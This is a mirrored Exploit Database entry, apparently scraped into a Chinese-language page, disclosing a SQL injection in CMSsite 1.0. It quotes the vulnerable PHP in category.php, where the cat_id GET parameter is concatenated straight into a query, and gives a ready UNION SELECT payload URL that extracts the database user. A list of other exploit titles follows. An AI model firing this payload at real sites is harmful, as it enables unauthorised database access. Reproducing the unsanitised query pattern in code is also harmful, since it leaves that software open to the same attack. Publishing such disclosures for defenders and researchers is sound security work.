CMSsite 1.0 – ‘cat_id’ SQL Injection

Exploit Database
15 阅读

作者： Majid kalantari

日期： 2019-01-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46259/

# Exploit Title: CMSsite 1.0 - SQL injection
# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
# Date: 2019-01-27
# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A
===============================================

# vulnerable file: category.php
# vulnerable parameter : cat_id

if (isset($_GET['cat_id'])) {
$category = $_GET['cat_id'];
}
$query = "SELECT * FROM posts WHERE post_category_id=$category";
$run_query = mysqli_query($con, $query);

# payload : http://127.0.0.1/cm/category.phpcat_id=7 UNION SELECT
1,2,user(),3,4,5,6,7,8,9,10%23

===============================================

last Exploits
CMSsite 1.0 – ‘cat_id’ SQL Injection的更多信息

The Open ISES Project 3.30A – ‘tick_lat’ SQL Injection：
Joomla! Component com_niceajaxpoll 1.3.0 – SQL Injection：
Joomla! Component com_as – ‘catid’ SQL Injection：
Technicolor TC7337 – ‘SSID’ Persistent Cross-Site Scripting：
Adserver Script 5.6 – SQL Injection：
SilverStripe CMS Pixlr Image Editor – ‘upload.php’ Arbitrary File Upload：
Xoops CMS 2.5.10 – Stored Cross-Site Scripting (XSS) (Authenticated)：
PHP Shopping Cart 4.2 – Multiple-SQLi：